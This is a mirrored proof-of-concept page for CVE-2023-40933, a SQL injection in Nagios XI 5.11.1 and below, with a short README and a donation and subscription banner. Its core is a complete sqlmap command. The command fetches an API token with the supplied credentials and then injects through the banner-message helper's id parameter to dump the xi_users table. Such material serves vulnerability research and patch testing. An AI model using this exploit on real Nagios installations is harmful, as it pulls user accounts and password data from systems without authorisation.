Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-40933 PoC — Nagios XI SQL注入漏洞

Source
https://github.com/sealldeveloper/CVE-2023-40933-PoC
Associated Vulnerability
Title:Nagios XI SQL注入漏洞 (CVE-2023-40933)
Description:A SQL injection vulnerability in Nagios XI v5.11.1 and below allows authenticated attackers with announcement banner configuration privileges to execute arbitrary SQL commands via the ID parameter sent to the update_banner_message() function.
Description
The sqlmap payload to exploit CVE-2023-40933
Readme
# CVE-2023-40933
The sqlmap payload to exploit CVE-2023-40933

## Payload
Required Information:

- Valid Username and Password
- Domain and path of hosted instance

```
sqlmap -D nagiosxi -T xi_users -u "https://<INSTANCE>/nagiosxi/admin/banner_message-ajaxhelper.php?action=update_banner_message_settings&id=3&token=`curl -ksX POST https://<INSTANCE>/nagiosxi/api/v1/authenticate -d "username=<USERNAME>&password=<PASSWORD>&valid_min=1000" | awk -F'"' '{print$12}'`" --dump --level 4 --risk 3 -p id --batch
```
File Snapshot

 [4.0K]  /data/pocs/fa3357b76dbd3affaa87e43070b03a5acb2489f7
└── [ 512]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →